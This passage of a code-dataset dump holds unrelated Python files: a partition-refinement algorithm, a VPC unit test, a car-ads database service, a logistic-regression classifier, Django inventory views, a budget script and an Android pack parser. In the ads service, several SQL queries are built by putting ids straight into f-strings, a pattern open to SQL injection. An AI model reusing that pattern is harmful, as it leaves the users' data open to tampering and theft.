Unlike the better-known `UnionFind` data structure, which *merges* sets,\nthe `PartitionRefinement` data structure performs the \"dual\" operation of\n*splitting* sets.\n\nImportant use cases:\n - Efficient DFA minimization\n\nReferences:\n https://en.wikipedia.org/wiki/Partition_refinement\n\nOriginal version by Ryan Cotterell\n\n\"\"\"\n\nimport numpy as np\nfrom collections import defaultdict\nfrom arsenal import colors\n\n\ndef stable(f, P):\n \"Is partition P stable?\"\n D = {}\n for n, B in enumerate(P):\n for q in B:\n D[q] = n\n for B in P:\n for p in B:\n for q in B:\n if D[f[p]] != D[f[q]]:\n return False\n return True\n\n\ndef split(S, P):\n return frozenset(P & S), frozenset(P-S)\n\n\ndef hopcroft(f, P):\n\n # compute the pre-image of f\n finv = defaultdict(set)\n for n in f:\n finv[f[n]].add(n)\n\n stack = list(P)\n\n while stack: # empties in O(log n) steps\n S = stack.pop()\n R = set() # new refinement\n\n # compute subset of the pre-image in O(n) time\n Sinv = set.union(*[finv[x] for x in S])\n\n for B in P: # entire loop runs in O(n) time\n X, Y = split(Sinv, B) # runs in O(|B|) time\n\n if len(X) > 0 and len(Y) > 0:\n # X, Y are now part of the refinement\n R.add(X)\n R.add(Y)\n\n # Hopcroft's speed-up to the slower algorithm is that we\n # only need to enqueue the smaller set.\n if len(X) < len(Y):\n stack.append(X)\n else:\n stack.append(Y)\n else:\n # Q remains part of the refinement\n R.add(B)\n P = R\n\n return frozenset(P)\n\n\ndef slow(f, P):\n\n # compute the pre-image of f\n finv = defaultdict(set)\n for n in f:\n finv[f[n]].add(n)\n\n stack = list(P)\n\n while stack: # empties in O(n) steps\n S = stack.pop()\n R = set() # new refinement\n\n # compute subset of the pre-image in O(n) time\n Sinv = set.union(*[finv[x] for x in S])\n\n for B in P: # entire loop runs in O(n) time\n X, Y = split(Sinv, B) # runs in O(|B|) time\n\n if len(X) > 0 and len(Y) > 0:\n # X, Y are now part of the refinement\n R.add(X)\n R.add(Y)\n\n # X, Y become future splitters\n stack.append(X)\n stack.append(Y)\n else:\n # Q remains part of the refinement\n R.add(B)\n P = R\n\n return frozenset(P)\n\n\ndef test_partition():\n import random\n\n for _ in range(25):\n N = 50\n\n # create random total function\n f = dict(zip(range(N), random.choices(range(N), k=N)))\n\n # create random partition\n i = random.randint(2, N-1)\n P = np.random.permutation(range(N))\n P = { frozenset(P[:i]), frozenset(P[i:]) }\n\n want = slow(f, P)\n have = hopcroft(f, P)\n assert want == have\n assert stable(f, have)\n #print(want)\n\n print(colors.ok)\n\n\nif __name__ == '__main__':\n from arsenal import testing_framework\n testing_framework(globals())\n","sub_path":"arsenal/datastructures/partition_refinement.py","file_name":"partition_refinement.py","file_ext":"py","file_size_in_byte":3303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"596668966","text":"#!/usr/bin/env python\n\nimport unittest\nimport template_creator\nimport yaml\n\n\nclass TestVpcMethods(unittest.TestCase):\n\n def setUp(self):\n with open('template_config.yaml', 'r') as f:\n self.config = yaml.load(f.read())\n self.cloudformation = template_creator.Cloudformation(self.config)\n\n self.vpcnamen = {\"Value\": {\"Ref\": \"AWS::StackName\"}}\n\n def test_vpcname_output(self):\n print(self.cloudformation.vpc.vpcname.to_dict())\n self.assertDictEqual(\n self.cloudformation.vpc.vpcname.to_dict(),\n self.vpcnamen)\n\n\nif __name__ == '__main__':\n 
unittest.main()\n","sub_path":"tests/test_VPCName_output.py","file_name":"test_VPCName_output.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"329501264","text":"from datetime import datetime\n\n\ndef get_ad(cursor, ad_id):\n cursor.execute(\n f'SELECT * FROM ad WHERE ad.id = {ad_id};'\n )\n fetched = cursor.fetchone()\n if fetched is None:\n return None\n response = dict(fetched)\n response[\"date\"] = datetime.utcfromtimestamp(int(response['date']))\n return response\n\n\ndef get_tags(cursor, ad_id):\n cursor.execute(\n 'SELECT tag.name FROM tag '\n 'JOIN adtag ON adtag.tag_id = tag.id '\n 'JOIN ad ON ad.id = adtag.ad_id '\n 'WHERE ad.id = ?;', (ad_id,)\n )\n return [dict(row)['name'] for row in cursor.fetchall()]\n\n\ndef get_car(cursor, car_id):\n cursor.execute(\n f'SELECT * FROM car WHERE car.id = {car_id};'\n )\n response = dict(cursor.fetchone())\n del (response['id'])\n return response\n\n\ndef get_colors(cursor, car_id):\n cursor.execute(\n 'SELECT color.id, color.name, color.hex '\n 'FROM color '\n 'JOIN carcolor ON carcolor.color_id = color.id '\n 'JOIN car ON car.id = carcolor.car_id '\n 'WHERE car.id = ?;', (car_id,)\n )\n return [dict(row) for row in cursor.fetchall()]\n\n\ndef get_images(cursor, car_id):\n cursor.execute(\n 'SELECT image.title, image.url '\n 'FROM image '\n 'JOIN carimage ON carimage.image_id = image.id '\n 'JOIN car on car.id = carimage.car_id '\n 'WHERE car.id = ?;', (car_id,)\n )\n return [dict(row) for row in cursor.fetchall()]\n\n\nclass AdsServices:\n def __init__(self, connection):\n self.con = connection\n\n def get_ad__account_info(self, ad_id):\n cursor = self.con.cursor()\n cursor.execute(\n 'SELECT seller_id, car_id, account_id '\n 'FROM ad '\n 'JOIN seller ON seller.id = ad.seller_id '\n 'JOIN account ON account.id = seller.account_id '\n 'WHERE ad.id = ?',\n (ad_id,)\n )\n info = dict(cursor.fetchone())\n account_id = info.get('account_id')\n seller_id = info.get('seller_id')\n car_id = info.get('car_id')\n return account_id, seller_id, car_id\n\n def delete_ad(self, ad_id, car_id):\n cursor = self.con.cursor()\n cursor.execute(\n f'DELETE FROM ad WHERE id = {ad_id};'\n )\n cursor.execute(\n f'DELETE FROM car WHERE id = {car_id};'\n )\n cursor.execute(\n f'DELETE FROM carcolor WHERE car_id = {car_id};'\n )\n cursor.execute(\n f'DELETE FROM adtag WHERE ad_id = {ad_id}'\n )\n cursor.execute(\n f'SELECT id from carimage WHERE car_id = {car_id}'\n )\n images_id_list = [tuple(dict(row).values()) for row in cursor.fetchall()]\n cursor.executemany(\n f'DELETE FROM image WHERE id = ?;', images_id_list\n )\n cursor.execute(\n f'DELETE FROM carimage WHERE car_id = {car_id}'\n )\n\n def get_one_ad(self, ad_id):\n cursor = self.con.cursor()\n response = get_ad(cursor, ad_id)\n car_id = response['car_id']\n response['tags'] = get_tags(cursor, ad_id)\n response['car'] = get_car(cursor, car_id)\n response['car']['colors'] = get_colors(cursor, car_id)\n response['car']['images'] = get_images(cursor, car_id)\n\n del (response['car_id'])\n return response\n","sub_path":"src/services/ads.py","file_name":"ads.py","file_ext":"py","file_size_in_byte":3339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"482200966","text":"import numpy as np\nimport math\n\n\nclass LRC:\n def __init__(self, alpha):\n self.features = np.matrix('0')\n self.labels = np.matrix('0')\n self.weights = np.matrix('0')\n self.alpha = alpha\n 
self.test_data = None\n\n def get_train_data(self, data_path, ratio=0, split=0.5):\n\n \"\"\"\n Get the train set from the given file path\n\n :param data_path: the file path of data\n :param ratio: the negative samples to positive sample ratio, default equal to 0 means original data\n :param split: the train set size to test set size ratio, default equal to 0.5\n :return: (matrix, matrix), feature and label\n\n \"\"\"\n sample_data = np.loadtxt(data_path, dtype=np.float, delimiter=\",\")\n x0 = np.ones(sample_data.shape[0])\n sample_data = np.c_[x0, sample_data] # Add x0=1 for every feature vector\n\n # Get the train set and test set by split\n m, n = sample_data.shape\n if split < 0 or split >= 1:\n print(\"split is out of range.\")\n return None, None\n split_num = int(m * split)\n self.test_data = sample_data[split_num:]\n train_data = sample_data[0:split_num]\n\n # Adjust the train set to specific ratio of negative samples to positive sample\n positive_mat = np.mat([row for row in train_data if row[n - 1] > 0.5])\n negative_mat = np.mat([row for row in train_data if row[n - 1] < 0.5])\n\n positive_num = positive_mat.shape[0]\n negative_num = negative_mat.shape[0]\n\n target_negative_num = int(positive_num * ratio)\n if target_negative_num > negative_num:\n print(\"The ratio is too big.\")\n return None, None\n elif ratio == 0:\n target_sample_data = np.row_stack((positive_mat, negative_mat))\n return target_sample_data[:, 0:-1], target_sample_data[:, -1:]\n else:\n target_negative_mat = negative_mat[0:target_negative_num, :]\n target_sample_data = np.row_stack((positive_mat, target_negative_mat))\n\n return target_sample_data[:, 0:-1], target_sample_data[:, -1:]\n\n def get_test_data(self):\n features = np.mat(self.test_data[:, 0:-1])\n labels = np.mat(self.test_data[:, -1:])\n return features, labels\n\n def fit(self, x, y):\n \"\"\"\n Train the model with train set\n\n :param x: the training feature matrix\n :param y: the training label matrix\n :return: True for a successful training, otherwise return False\n \"\"\"\n if x is None:\n return False\n else:\n self.features = x\n self.labels = y\n self.__grad_descent()\n return True\n\n @staticmethod\n def sigmoid(z):\n return 1.0 / (1 + math.exp(-z))\n\n def __grad_descent(self):\n m, n = self.features.shape\n max_cycle = 600\n self.weights = np.mat(np.ones((n, 1))) # Initialize the weight vector\n sig = np.vectorize(self.sigmoid)\n\n for k in range(max_cycle):\n h = sig(self.features * self.weights)\n error = h - self.labels\n self.weights -= (self.alpha / m) * self.features.transpose() * error\n\n def predict(self, feature_set):\n \"\"\"\n Predict the labels of given data set with a trained model\n\n :param feature_set: the feature matrix\n :return: the predicted label matrix\n \"\"\"\n feature_set = feature_set.getA()\n m, n = feature_set.shape\n if n != self.weights.shape[0]:\n print(\"Wrong size of test data!\")\n else:\n predicted_labels = np.dot(feature_set, self.weights) > 0.5\n return predicted_labels.astype(int)\n\n @staticmethod\n def classification_report(expected, predicted):\n \"\"\"\n Build a text report showing the main classification metrics\n\n :param expected: 1d array-like, or label indicator array / sparse matrix\n Ground truth (correct) target values.\n :param predicted: 1d array-like, or label indicator array / sparse matrix\n Estimated targets as returned by a classifier.\n :return: null\n\n \"\"\"\n from sklearn import metrics\n print(\"Classification report for classifier :\\n%s\\n\"\n % 
metrics.classification_report(expected, predicted))\n print(\"Confusion matrix:\\n%s\" % metrics.confusion_matrix(expected, predicted))\n\n @staticmethod\n def classification_evaluate(expected, predicted):\n from sklearn import metrics\n confusion_matrix = metrics.confusion_matrix(expected, predicted)\n accuracy_score = confusion_matrix[1, 1]/(confusion_matrix[0, 1] + confusion_matrix[1, 1])\n return accuracy_score, metrics.recall_score(expected, predicted), metrics.f1_score(expected, predicted)\n","sub_path":"homework/LogisticReg.py","file_name":"LogisticReg.py","file_ext":"py","file_size_in_byte":4841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"538862968","text":"\"\"\"Importando de rest_framework\"\"\"\r\nimport json\r\nfrom inventario.Serializers.serializers import (\r\n SoftwareSerializer, AreaSerializer, EmpleadoSerializer, UserSerializer, UserLoginSerializer)\r\nfrom inventario.models import (Software, Area, Empleado)\r\nfrom django.shortcuts import render, get_object_or_404, redirect\r\nfrom rest_framework.decorators import permission_classes\r\nfrom rest_framework.permissions import IsAuthenticated\r\nfrom django.contrib import messages\r\nfrom django.http import JsonResponse\r\nfrom django.contrib.auth.models import User\r\nfrom rest_framework import viewsets, mixins, status\r\nfrom rest_framework.response import Response\r\nfrom rest_framework.decorators import api_view\r\nfrom rest_framework.views import APIView\r\nfrom django.http import QueryDict\r\nfrom django.contrib.auth import authenticate\r\nfrom django.contrib.auth import login as do_login\r\n\"\"\"Importando los serializadores y modelos a utilizar\"\"\"\r\nfrom django.contrib.auth.decorators import login_required\r\n\r\n\r\n@api_view(['GET'])\r\ndef index(request):\r\n return render(request, 'Login/Login.html')\r\n\r\n\r\ndef AreaData():\r\n queryset = Area.objects.all()\r\n return queryset\r\n\r\n\r\ndef SoftwareIndex(request):\r\n return render(request, 'Software/SC.html', {'queryarea': AreaData()})\r\n\r\n\r\ndef BSoftwareIndex(request):\r\n return render(request, 'Software/SR.html', {'queryarea': AreaData()})\r\n\r\n\r\ndef SoftwareDniEmpleado(request, dniempleado):\r\n query = Software.objects.filter(dni_empleado=dniempleado)\r\n querys = SoftwareSerializer(query, many=True)\r\n return JsonResponse(querys.data, safe=False)\r\n\r\n@login_required\r\ndef EmpleadoJson(request, idarea):\r\n query = Empleado.objects.filter(id_area=idarea)\r\n querys = EmpleadoSerializer(query, many=True)\r\n return JsonResponse(querys.data, safe=False)\r\n\r\n\r\ndef EmpleadoDetail(request, idarea):\r\n queryset2 = Empleado.objects.filter(id_area=idarea)\r\n return render(request, 'Hardware/CH.html', {'queryarea': AreaData(), 'queryempleado': queryset2})\r\n\r\n\r\ndef FormHardware(request):\r\n return render(request, 'Hardware/CH.html', {'queryarea': AreaData()})\r\n\r\n\r\n@api_view(['GET', 'POST'])\r\ndef SoftwareGetPost(request):\r\n if request.method == 'GET':\r\n software = Software.objects.all()\r\n serializer = SoftwareSerializer(software, many=True)\r\n print(serializer.data)\r\n return Response(serializer.data)\r\n elif request.method == 'POST':\r\n print(request.POST['nombre_software'])\r\n serializer = SoftwareSerializer(data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n msg = 'El inventario de software se almaceno correctamente'\r\n messages.success(\r\n request, msg, extra_tags='col-12 alert alert-success')\r\n return redirect(\"SC\")\r\n 
else:\r\n            messages.error(request, 'Ocurrio un error al tratar de almacenar el producto',\r\n                           extra_tags='col-12 alert alert-danger')\r\n            return redirect(\"SC\")\r\n\r\n\r\n\"\"\"@api_view(['GET','PUT','DELETE'])\r\ndef SoftwareUpdateDelete(request,id):\r\n    try:\r\n        software=Software.objects.get(id_software=id)\r\n        print(software.data)\r\n    except:\r\n        return response(status=status.HTTP_404_NOT_FOUND)\r\n    if request.method == 'GET':\r\n        serializer = SoftwareSerializer(software)\r\n        return Response(serializer.data)\r\n    if request.method == 'PUT':\r\n        serializer = SoftwareSerializer(software, data=request.DATA)\r\n        if serializer.is_valid():\r\n            serializer.save()\r\n            return Response(serializer.data)\r\n        else:\r\n            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n    elif request.method == 'DELETE':\r\n        software.delete()\r\n        return Response(status=status.HTTP_204_NO_CONTENT)\"\"\"\r\n\r\n\r\n@api_view(['GET', 'POST'])\r\ndef SoftwareGetUpdate(request, idsoftware):\r\n    try:\r\n        software = Software.objects.get(id_software=idsoftware)\r\n    except Software.DoesNotExist:\r\n        return JsonResponse({\"success\": 404}, status=404)\r\n    if request.method == 'GET':\r\n        area = software.dni_empleado.id_area\r\n        sarea = AreaSerializer(area, many=False)\r\n        empleado = software.dni_empleado\r\n        sempleado = EmpleadoSerializer(empleado, many=False)\r\n        serializer = SoftwareSerializer(software)\r\n        querys = serializer.data\r\n        return render(request, 'Software/SU.html', {'querys': serializer.data, 'queryarea': AreaData(), 'area': sarea.data, 'empleado': sempleado.data})\r\n    elif request.method == 'POST':\r\n        print(\"handling POST\")\r\n        serializer = SoftwareSerializer(software, data=request.data)\r\n        if serializer.is_valid():\r\n            serializer.save()\r\n            messages.success(request, 'El software se actualizo correctamente',\r\n                             extra_tags='col-12 alert alert-success')\r\n            return redirect('SU', idsoftware=idsoftware)\r\n        else:\r\n            messages.error(request, 'Ocurrio un error al tratar de almacenar el producto',\r\n                           extra_tags='col-12 alert alert-danger')\r\n            return redirect('SU', idsoftware=idsoftware)\r\n\r\n\r\n@api_view(['POST'])\r\ndef SoftwareDelete(request, idsoftware):\r\n    print(\"idsoftware \" + idsoftware)\r\n    try:\r\n        software = Software.objects.get(id_software=idsoftware)\r\n    except Software.DoesNotExist:\r\n        return JsonResponse({\"success\": 404}, status=404)\r\n    if request.method == 'POST':\r\n        software.delete()\r\n        print(\"deleted\")\r\n        return JsonResponse({\"success\": True}, status=200)\r\n    return JsonResponse({\"success\": True}, status=400)\r\n\r\n\r\nclass SoftwareView(mixins.CreateModelMixin, viewsets.GenericViewSet):\r\n    serializer_class = SoftwareSerializer\r\n    queryset = Software.objects.all()\r\n\r\n\r\nclass AreaView(viewsets.ModelViewSet):\r\n    serializer_class = AreaSerializer\r\n    queryset = Area.objects.all()\r\n\r\n\r\nclass UserView(viewsets.ModelViewSet):\r\n    serializer_class = UserSerializer\r\n    queryset = User.objects.all()\r\n\r\n\r\nclass UserLoginView(APIView):\r\n\r\n    def post(self, request):\r\n        user=authenticate(username=request.POST.get('username'),password=request.POST.get('password'))\r\n        print(user)\r\n        if user is not None:\r\n            do_login(request,user)\r\n            return redirect('PCC')\r\n        else:\r\n            messages.error(request, 'El usuario o la contraseña son invalidos', extra_tags='col-12 alert alert-danger')\r\n            return redirect('index')\r\n        '''lista={'username':request.POST.get('username'),'password':request.POST.get('password')}\r\n        serializer = UserLoginSerializer(data=request.data)\r\n        if serializer.is_valid():\r\n            
user, token = serializer.save()\r\n            print('usuario', user)\r\n            print('token', token)\r\n            data = {\r\n                'status': 'ok',\r\n                'token': token\r\n            }\r\n            return JsonResponse({\"token\":token})\r\n        messages.error(request, 'El usuario o la contraseña son invalidos',\r\n                       extra_tags='col-12 alert alert-danger')\r\n        return redirect('index')'''\r\n","sub_path":"app/inventario/Views/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"}
+{"seq_id":"167222812","text":"import os\nimport csv\n\nbudget_csv = os.path.join(\"Resources\", \"budget_data.csv\")\nmonths = [] #stores all the months\ntotal = int(0)\nprofit = [] #stores all the profits/losses\nchange = [] #change between each month\ntotal_change = int(0)\nwith open(budget_csv,'r') as csvfile:\n    budget_data = csv.reader(csvfile, delimiter=\",\")\n\n    csv_header = next(budget_data)\n    #print(f\"CSV Header: {csv_header}\")\n\n    for row in budget_data:\n        months.append(row[0])\n        profit.append(int(row[1]))\n        total = total + int(row[1])\n\n\nfor x in range(len(profit)-1):\n    difference = profit[x + 1] - profit[x]\n    change.append(difference)\n\nfor x in range(len(change)): #finds total of the change between months\n    total_change = total_change + change[x]\naverage = round(float(total_change/len(change)),2) #average change between months\n\n\n\ntotal_months = len(months)\n\n#use fresh names so the max()/min() builtins are not shadowed\ngreatest = max(change)\nleast = min(change)\n\n#finds the corresponding month for max and min change\nmax_month = change.index(greatest) + 1\nmin_month = change.index(least) + 1\n#print(max_month)\n#print(months)\n#print(profit)\n#print(change)\n\n#print(len(profit))\n#print(len(change))\n#print(months[25])\n#print(change.index(greatest))\n\n#----------------------------------------------\n#output\nprint(\"Financial Analysis\")\nprint(\"-------------------------\")\n\nprint(f\"Total Months: {total_months}\")\nprint(f\"Total: ${total}\")\nprint(f\"Average Change: ${average}\")\nprint(f\"Greatest Increase in Profits: {months[max_month]} (${greatest})\")\nprint(f\"Greatest Decrease in Profits: {months[min_month]} (${least})\")\n\n\n\n# Specify the file to write to\noutput_path = os.path.join(\"Analysis\", \"bank.csv\")\n\n# Open the file using \"write\" mode. 
Specify the variable to hold the contents\nwith open(output_path, 'w', newline='') as csvfile:\n\n    # Initialize csv.writer\n    csvwriter = csv.writer(csvfile, delimiter=' ')\n\n    # Write the first row\n    csvwriter.writerow([\"Financial Analysis\"])\n\n    # Write the second row (a bare string would be split into one field per character)\n    csvwriter.writerow([\"-------------------------\"])\n    csvwriter.writerow([f\"Total Months: {total_months}\"])\n    csvwriter.writerow([f\"Total: ${total}\"])\n    csvwriter.writerow([f\"Average Change: ${average}\"])\n    csvwriter.writerow([f\"Greatest Increase in Profits: {months[max_month]} (${greatest})\"])\n    csvwriter.writerow([f\"Greatest Decrease in Profits: {months[min_month]} (${least})\"])\n","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"}
+{"seq_id":"231556160","text":"#\n# Copyright (C) 2016 The Android Open Source Project\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#      http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n\"\"\"This file provides all Pack element related parsing.\"\"\"\n\nimport os\n\nfrom project import acl\nfrom project import common\n\n\nWILDCARD = '*'\n\n\nclass Pack(object):\n    \"\"\"Pack objects represent the <pack> element.\"\"\"\n    def __init__(self, namespace, name):\n        self._namespace = namespace\n        self._name = name\n        self._depends = {'requires':[], 'provides':[]}\n        self._copies = []\n        self._configs = []\n        self._defaults = DefaultCopy()\n        self._origin = common.Origin()\n\n    def _alias_puidlist(self, old_ns, new_ns, puidlist):\n        \"\"\"Takes a list of pack ids and changes their prefix in a new list.\"\"\"\n        new_list = []\n        for puid in puidlist:\n            if puid.startswith('{}.'.format(old_ns)):\n                new_list += ['{}{}'.format(new_ns, puid[len(old_ns):])]\n            else:\n                new_list += [puid]\n        return new_list\n\n    def alias(self, new_ns):\n        \"\"\"Swap out the namespace prefix in all absolute ids.\"\"\"\n        self._depends['requires'] = self._alias_puidlist(\n            self._namespace, new_ns, self._depends['requires'])\n        self._depends['provides'] = self._alias_puidlist(\n            self._namespace, new_ns, self._depends['provides'])\n        self._namespace = new_ns\n\n    @property\n    def namespace(self):\n        return self._namespace\n\n    @property\n    def origin(self):\n        \"\"\"Returns string indicating where the pack was defined.\"\"\"\n        return self._origin\n\n    @property\n    def uid(self):\n        \"\"\"Returns the fully qualified unique pack name\"\"\"\n        return '{}.{}'.format(self._namespace, self._name)\n\n    @property\n    def name(self):\n        \"\"\"Returns the namespace-local pack name.\"\"\"\n        return self._name\n\n    @property\n    def requires(self):\n        \"\"\"Returns a list of required fully qualified pack unique names.\"\"\"\n        return self._depends['requires']\n\n    @property\n    def provides(self):\n        \"\"\"Returns a list of provided fully qualified pack virtual names.\"\"\"\n        return self._depends['provides']\n\n    def add_provides(self, virtual_name):\n        # Duplicates are ignored.\n        if virtual_name in self._depends['provides']:\n            return\n        self._depends['provides'].append(virtual_name)\n\n    @property\n    def 
defaults(self):\n        \"\"\"Returns the DefaultCopy node if defined.\"\"\"\n        return self._defaults\n\n    @defaults.setter\n    def defaults(self, default_copy):\n        self._defaults = default_copy\n\n    @property\n    def copies(self):\n        \"\"\"Returns the list of child Copy objects.\"\"\"\n        return self._copies\n\n    def add_copy(self, copy):\n        self._copies.append(copy)\n\n    @property\n    def configs(self):\n        \"\"\"Returns the list of child Config objects.\"\"\"\n        return self._configs\n\n    def __repr__(self):\n        s = '<pack name={}>{}{}{}{}{}</pack>'.format(\n            self._name,\n            ''.join(['<provides pack={}/>'.format(p)\n                     for p in self._depends['provides']]),\n            ''.join(['<requires pack={}/>'.format(p)\n                     for p in self._depends['requires']]),\n            ''.join([str(c) for c in self._copies]),\n            self._configs or '',\n            self._defaults\n        )\n        return s\n\n    def load(self, ele):\n        \"\"\"Loads the Pack from a XML element node.\"\"\"\n        ele.limit_attribs(['name'])\n        # Override any pre-defined name.\n        self._name = ele.get_attrib('name')\n        self._origin = ele.origin.copy()\n        for child in ele.findall('defaults'):\n            self._defaults.load(child)\n        for pack_op in self._depends:\n            for child in ele.findall(pack_op):\n                child.limit_attribs(['pack'])\n                n = child.get_attrib('pack')\n                if '.' not in n:\n                    raise common.LoadErrorWithOrigin(\n                        child.origin,\n                        ('<{}> must supply fully qualified pack names: '\n                         '{}'.format(pack_op, n)))\n                self._depends[pack_op].append(n)\n        for child in ele.findall('copy'):\n            c = Copy(self)\n            c.load(child)\n            self._copies.append(c)\n        for child in ele.findall('config'):\n            c = Config(self)\n            c.load(child)\n            self._configs.append(c)\n\n\nclass CopyType(object):\n    DIR = 1\n    FILE = 2\n    GLOB = 3\n    @staticmethod\n    def get(path):\n        if path.endswith(os.sep):\n            return CopyType.DIR\n        if path.endswith(WILDCARD):\n            return CopyType.GLOB\n        return CopyType.FILE\n\n\nclass DefaultCopy(object):\n    def __init__(self):\n        self._origin = common.Origin()\n        self._dst = None\n        self._acl = acl.FileAcl(None)\n\n    def load(self, ele):\n        ele.limit_attribs([])\n        copies = ele.findall('copy')\n        if len(copies) == 0:\n            return\n        if len(copies) != 1:\n            raise common.LoadErrorWithOrigin(\n                ele.origin, 'Only one copy element may be defined in defaults.')\n        ele = copies[0]\n        ele.limit_attribs(['to'])\n        # TODO(wad) Here and elsewhere, ensure attrib only\n        # has keys that are explicitly supported.\n        self._origin = ele.origin.copy()\n        if 'to' in ele.attrib:\n            self._dst = ele.get_attrib('to')\n            if CopyType.get(self._dst) != CopyType.DIR:\n                raise common.LoadErrorWithOrigin(\n                    self._origin,\n                    ('default copy destinations must be directories, suffixed '\n                     'by a {}'.format(common.pathsep)))\n        acls = ele.findall('set-acl')\n        if len(acls) > 1:\n            raise common.LoadErrorWithOrigin(\n                ele.origin, 'Only one set-acl default may be set')\n        if len(acls):\n            self._acl.load(acls[0])\n\n    @property\n    def dst(self):\n        return self._dst\n\n    @property\n    def acl(self):\n        return self._acl\n\n    def __repr__(self):\n        return '<defaults to={} {}/>'.format(\n            self._dst or '', self._acl)\n\n\nclass Copy(object):\n    def __init__(self, pack, dst='', dst_type=CopyType.FILE, src='',\n                 src_type=CopyType.FILE):\n        self._pack = pack\n        self._dst = dst\n        self._dst_type = dst_type\n        # Set the default \"to\" if the pack has none.\n        if pack is not None and pack.defaults is not None:\n            if pack.defaults.dst is not None:\n                self._dst = pack.defaults.dst\n                self._dst_type = CopyType.get(self._dst)\n        self._src = src\n        self._src_type = src_type\n        self._recurse = False\n        self._acl = acl.FileAcl(self)\n        self._origin = common.Origin()\n\n    @property\n    def pack(self):\n        return self._pack\n\n    @property\n    def 
origin(self):\n        return self._origin\n\n    def load(self, ele):\n        \"\"\"Loads the Copy from a XML element node (copy).\"\"\"\n        ele.limit_attribs(['to', 'from', 'recurse'])\n        # Always get to from the element.\n        if 'to' in ele.attrib:\n            self._dst = ele.get_attrib('to')\n        # Fail if there is no 'to' default or defined 'to'.\n        if self._dst == '':\n            self._dst = ele.get_attrib('to')\n\n        self._dst_type = CopyType.get(self._dst)\n        self._src = ele.get_attrib('from')\n        self._src_type = CopyType.get(self._src)\n        recurse = (ele.attrib.get('recurse') or 'false').lower()\n        self._origin = ele.origin.copy()\n        if recurse == 'true':\n            self._recurse = True\n        elif recurse == 'false':\n            self._recurse = False\n        else:\n            raise common.LoadErrorWithOrigin(\n                self._origin, '<copy> recurse element not \"true\" or \"false\"')\n\n        acls = ele.findall('set-acl')\n        if len(acls) > 1:\n            raise common.LoadErrorWithOrigin(\n                ele.origin, 'Only one <set-acl> element is allowed per <copy>')\n        if len(acls):\n            self._acl.load(acls[0])\n        self._reconcile_paths()\n\n    def _reconcile_paths(self):\n        if not self._dst.startswith(common.pathsep):\n            raise common.LoadErrorWithOrigin(\n                self._origin,\n                ('<copy> destinations must be absolute (start with a {}): '\n                 '{}'.format(common.pathsep, self._dst)))\n        if self._recurse:\n            # Ensure recursive destinations are paths and require a trailing\n            # slash. This is pedantic, but it is better to start explicit.\n            if not self._dst_type == CopyType.DIR:\n                raise common.LoadErrorWithOrigin(\n                    self._origin,\n                    '<copy> specifies recursion but the destination \"{}\" '\n                    'does not have a trailing path separator'.format(self._dst))\n            # Similarly, recursive sources must be labeled as paths using\n            # trailing slashes or end with a wildcard (*) allowing a path to be\n            # copied or the contents of a path.\n            if self._src_type == CopyType.FILE:\n                raise common.LoadErrorWithOrigin(\n                    self._origin,\n                    '<copy> specifies recursion but the source \"{}\" '\n                    'does not have a trailing path separator or '\n                    'wildcard'.format(self._src))\n            # If we're copying the path, we could translate it into a more\n            # specific glob here, but there is no benefit using normal python\n            # helpers.\n\n        # For file copies into a path, compute the final path.\n        if not self._recurse:\n            if (self._dst_type == CopyType.DIR\n                    and self._src_type == CopyType.FILE):\n                # foo/bar.txt -> /system/bin/ becomes /system/bin/bar.txt\n                self._dst = common.path_join(self._dst,\n                                             common.basename(self._src))\n                self._dst_type = CopyType.FILE\n            elif (self._dst_type == CopyType.DIR\n                    and self._src_type == CopyType.DIR):\n                # foo/bar/ -> /system/blah becomes /system/blah/bar/\n                # (GLOBs are used to copy contents to the same name.)\n                self._dst = common.path_join(\n                    self._dst,\n                    common.basename(self._src.rstrip(common.pathsep)))\n            elif (self._src_type == CopyType.GLOB\n                    and not self._dst_type == CopyType.DIR):\n                raise common.LoadErrorWithOrigin(\n                    self._origin,\n                    '<copy> source \"{}\" uses a wildcard but the destination '\n                    '\"{}\" does not have a trailing path separator'.format(\n                        self._src, self._dst))\n\n        # Absolutize the sources based on the defining file.\n        # This also means that sources must use host separators.\n        # TODO(wad) Consider allowing a base to be set by Packs on\n        # inclusion of a file.\n        self._src = common.path_to_host(self._src)\n        if not os.path.isabs(self._src):\n            base_path = os.path.dirname(self._origin.source_file)\n            self._src = os.path.abspath(os.path.join(base_path, self._src))\n\n        # Note, if we end up creating an image root, then we can also absolutize\n        # the 
